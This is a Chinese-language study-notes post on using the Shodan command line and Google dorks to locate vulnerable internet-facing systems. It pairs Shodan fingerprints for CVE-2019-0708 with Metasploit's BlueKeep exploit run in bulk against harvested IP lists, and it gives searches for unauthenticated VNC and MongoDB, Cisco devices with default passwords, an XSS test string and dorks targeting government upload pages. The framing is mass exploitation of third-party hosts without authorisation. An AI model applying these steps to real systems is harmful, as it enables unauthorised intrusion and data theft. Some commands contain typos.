admin 管理员组文章数量: 887007
目录
前言
shodan(1)
shodan(2)
shodan(3)
shodan(4)
shodan(5)
shodan(6)
shodan(7)
Google搜索
前言
Shodan是一个专注于搜索互联网设备和服务的搜索引擎。首先需要安装kail虚拟机,使用管理员(root)身份登录。
shodan(1)
首先安装shodan,打开kail的终端,输入以下指令
克隆shodan
git clone https://github/achillean/shodan-python.git
切换到shodan-python文件夹
cd shodan-python
安装
python setup.py install
初始化shodan,api_key为自己的shodan账户的会员密钥,可以去闲鱼买一个账号使用
shodan init api_key
shodan -h (查看使用帮助文档)
测试一下,寻找ip地址
shodan search —limit 10 country:jp
shodan search --limit 10 --fields ip country:jp
shodan search --limit 10 --fields ip,post country:jp (返回数字ip地址)
shodan search --limit 10 --fields ip_str country:jp (扫出来ip地址)
shodan search --cilor --limit 10 --fields ip_str port:3389 country:cn city:shenzhen
国别地区 country:cn
城市信息 city:shenzhen
端口 port:3389
查看ip信息 shodan host ip
过滤ip信息 --fields ip_str,port
显示信息数量 --limit 10
深色表示 --cilor
操作系统 os:windows7
漏洞 has_vuln:True
设备:摄像头 device:webcam
设备:路由器 device:router
web端的一些设备 tp-link
shodan(2)
查找cve-2019-0708的漏洞
shodan search --limit 10 --fields ip_str,port '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"' 十六机制字符串(类似于指纹的方式去寻找)
弱口令 Administrator &Administrator
metasploit 去进行批量的漏洞利用,msfconsole ,
search 0708
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show options
set rhosts file:拖入IP地址文件
check
攻击不成功,首先 show options ,看清我们的这个payload,ip端口 要填对,在一个就是show targets 它支持windows7,sever这种,你得把targets设置正确
download参数
shodan download -h (查看帮助文档)
shodan download 0708 --limit 10 --fields ip_str,port '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"' (删掉过滤信息)
parse参数
shodan parse -h (查看帮助文档)
shodan parse --fields ip_str 0708
这是批量刷漏洞的姿势
shodan search vuln:cve-2019-0708 这种可能需要更高级别的账号,我们换种方式照样绕过它去批量刷洞
shodan(3)
shodan count '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'
数据库里面大概存在这么多条与这个漏洞相关的东西
shodan honeyscore ip地址 可以自动判断它是不是蜜罐
可以到 https://honeyscore.shodan.io/ 网页端直接搜索
https://honeyscore.shodan.io/https://honeyscore.shodan.io/
利用shodan 查看IP地址的历史数据
shodan host ip --history
ping 网址获取ip地址
vnc空密码
shodan search --limit 30 --fields ip_str "authentication disabled" port:5900
shodan download --limit 30 --fields ip_str "authentication disabled" port:5900
shodan parse --fields ip_str 文件包>vnc.txt
shodan(4)
今天搜一些路由器交换机,以及其他的一些信息。
shodan myip (查看自己的出口IP,哪个地址链接的公网)
可以利用shodan查看一下哪些网站已经被黑了。
shodan search --limit 10 --fields ip_str,port http.title:hacked by
shodan search --limit 10 --fields ip_str,port http.title:hacked by country:cn city:beijing
title关键字还能搜一些其他的网站,比如棋牌、后台、mysql 等等
接下来去搜一些弱口令设备,比如思科、路由器等等
shodan search --limit 10 --fields ip_str,port "cisco -authorired port:23"
弱口令 :
username:cisco / admin
password: cisco
shodan(5)
利用shodan搜索网段
nsa ip address range
美国安全局官方网站 www.nsa.gov
shodan search --limit 10 --fields ip_str,port net:208.88.84.0/24
美国国家安全局的一个网段
shodan search --limit 10 --fields ip_str,port org:nsa.gov
搜索一些组织的IP地址
shodan search --limit 10 --fields ip_str,port hostname:google
找一些网址所在组织的IP地址
shodan search --limit 10 --fields ip_str,port country:cn http.waf:safedog
查找一些安装了安全狗waf的网站
验证:网址后加<script>alert("xss")</script>
shodan search --limit 10 --fields ip_str,port country:cn http.html:login
检索html前端页面中带有关键字的IP地址,和title类似
shodan search --limit 10 --fields ip_str "Mongodb server information -authentication" port:27017
搜Mongodb未授权登录 数据库 mongodb自己下载 未授权的一般能够直接链接数据库
jenkins 组件,可以搜索了解使用
shodan search --limit 10 --fields ip_str " X-Jenkins " OR "Set-cookie:JSESSIONID" http.title:"Dashboard"
shodan(6)
接下来了解shodan的图形化界面,前面都是学习命令行。
首先打开他们的官方网站,比如拿0708举例
'"\x03\x00\x00\x0b\x06\xd0\x00\x124\x00"'
直接在搜索框里搜索和命令行里面搜search是一摸一样的
搜索webcam (摄像头的信息)
monitor (shodan的一个模块,用来监控网站ip使用的),学术会员可以监控大约16个IP地址
mange(资产管理 添加要监控的网站ip)
settings (设置通知邮件)
dashboard (现有监控的一些信息 端口 漏洞 ip地址(存在cdn就会有多个地址))
shodan search --limit 10 --fields ip_str,port product:Apache httpd
shodan search --limit 10 --fields ip_str,port org:Tencent cloud
shodan(7)
shodan的其他命令参数:
alert
shodan alert -h
查看帮助文档,这个讲的是怎么去配置ip监控,我们能在web页面上面去做
info
shodan info
查看你查询的 扫面的一些次数
domain
shodan domain
查看域名信息,有很多的查询域名的工具,不一定要用shodan
比如shodan是非实时工具,可能我们扫描的一个ip地址的信息是几个月之前的
我们如果要用shodan去实时的扫描,再用scan扫描一下就行了
scan
shodan scan -h
查看帮助文档
shodan scan submit ip地址
shodan scan list 查看扫描信息
shodan stats --facets ssl.version country:cn has_ssl:true http
统计中国使用了ssl的ip,并用版本做一个统计
注意学习各种参数的组合,国家地区、漏洞、版本、ip等等的一系列参数配合起来
结合port 端口对应的服务去搜
mysql:3306
80 - HTTP
443 - HTTPS
21 - FTP
22 - SSH
25 - SMTP
110 - POP3
143 - IMAP
53 - DNS
3306 - MySQL数据库服务器
5432 - PostgreSQL数据库服务器
3389 - 远程桌面协议(RDP)
69 - TFTP
137-139 - NetBIOS端口
67-68 - DHCP
截图搜索参数 has_screenshot:true cisco
Google搜索
"inurl:admin":查看包含"admin"的网页URL,可能找到管理后台入口
"inurl:login":查看包含"login"的登录页面
"inurl:php?id=":查看可能存在SQL注入漏洞的PHP页面
"inurl:asp?id=":查看可能存在SQL注入漏洞的ASP页面
"inurl:jsp?id=":查看可能存在SQL注入漏洞的JSP页面
"filetype:pdf 关键词":查看特定关键词的PDF文件
"filetype:doc 关键词":查看特定关键词的Word文档
"filetype:xls 关键词":查看特定关键词的Excel表格
"intitle: 后台管理":查找标题中包含“后台管理”的网页
"intitle: 登陆页面":查找标题中包含“登陆页面”的网页
"site:gov inurl:upload":在政府网站中查找可能存在文件上传漏洞的页面
"site:edu inurl:forum":在教育机构网站中查找论坛页面
"site:com inurl:phpmyadmin":在商业网站中查找可能存在phpMyAdmin管理页面
"site:org inurl:password":在非营利组织网站中查找可能包含“password”的页面,可能找到泄露的密码信息
"site:net inurl:backup":在 域名网站中查找备份文件
"site:gov intitle:敏感信息":在政府中文域名网站中查找标题包含敏感信息的页面
"site:company inurl:confidential":在特定公司网站中查找包含”confidential“(机密)的页面
"site:domain inurl:uploads":在特定域名网站中查找上传文件的目录
"site:edu filetype:ppt 关键词":在教育机构中文域名网站中查找特定关键词的ppt文件
"site:*.gov inurl:vulnerability":在各种政府网站中查找包含"vulnerability"(漏洞)的页面
版权声明:本文标题:shodan学习笔记【泷羽sec】 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1732458346h1538407.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论